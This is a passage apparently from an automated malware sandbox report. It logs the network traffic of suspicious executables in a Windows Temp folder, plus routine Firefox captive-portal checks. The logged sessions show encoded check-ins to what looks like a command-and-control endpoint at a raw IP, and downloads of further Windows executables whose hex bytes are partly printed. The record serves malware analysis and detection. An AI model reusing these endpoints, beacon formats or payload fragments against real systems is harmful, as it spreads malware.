                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:27.916404009 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:28.231656075 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75782
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:38.234203100 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:42.092902899 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:42.443881035 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75796
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:43.338862896 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:43.654067993 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75797
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:53.728853941 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:03.928092003 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:09.877648115 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:10.193768024 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75824
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:20.234982014 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:30.439017057 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:40.637963057 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:50.838161945 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:01.046049118 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:11.226072073 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:31.766561031 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:32.082376957 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75905
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:44.925934076 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                Host: detectportal.firefox.com
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:45.241306067 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Content-Length: 90
                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                Date: Thu, 12 Dec 2024 15:52:26 GMT
                                                                                                                                                                                                                                                Age: 75919
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                63192.168.2.450435185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:50.194824934 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:51.539177895 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:51 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                64192.168.2.450444185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:53.693202019 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:55.100028992 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                65192.168.2.45044780.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:55.486824036 CET392OUTGET /soft/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: d
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.956932068 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:56 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="dll";
                                                                                                                                                                                                                                                Content-Length: 242176
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.956990004 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                                                                                                                                                                                                                                Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957005978 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                                                                                                                                                                                                                                Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957134962 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                                                                                                                                                                                                                                Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957158089 CET1236INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                                                                                                                                                                                                                                Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957175016 CET1236INData Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00
                                                                                                                                                                                                                                                Data Ascii: o/(z*{*v0rpsAz}(*{*v}(,}(*{*:}(*{*:}(*({o{ZX/{o{ZX((*J{ooo*J{oxo*2{
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957190990 CET1236INData Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e
                                                                                                                                                                                                                                                Data Ascii: }(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*2{o*^{{oo*:}(m*:
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957387924 CET1236INData Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03
                                                                                                                                                                                                                                                Data Ascii: {+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2s}-*}6{=ob-{=o\*rTp(;&*z,{<,{<o/(z*:{0ot*:{/ot
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957403898 CET1236INData Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00
                                                                                                                                                                                                                                                Data Ascii: (9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}d*(Co(D}d(F(E(&*";*><}n*{u*"}u*{v*"}v*{w*"
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.957420111 CET556INData Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22
                                                                                                                                                                                                                                                Data Ascii: ,{o#*o*{o(,{o)o,***u*{*"}*{*J{{(*F(uNoK*J(uNoL*F(uNoM*J(uNoN*{*"}*{*"}*{*"}*
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:57.077003956 CET1236INData Raw: 02 03 7d d1 01 00 04 2a 1e 02 7b d2 01 00 04 2a 22 02 03 7d d2 01 00 04 2a 1e 02 7b d3 01 00 04 2a 22 02 03 7d d3 01 00 04 2a 1e 02 7b d4 01 00 04 2a 22 02 03 7d d4 01 00 04 2a 1e 02 7b d5 01 00 04 2a 22 02 03 7d d5 01 00 04 2a 1e 02 7b d6 01 00
                                                                                                                                                                                                                                                Data Ascii: }*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                66192.168.2.450449185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:56.950689077 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:58.477531910 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:58 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                67192.168.2.45045580.82.65.70805332C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:54:58.789791107 CET392OUTGET /soft/download HTTP/1.1
                                                                                                                                                                                                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                User-Agent: s
                                                                                                                                                                                                                                                Host: 80.82.65.70
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:00.422493935 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:59 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="soft";
                                                                                                                                                                                                                                                Content-Length: 1502720
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
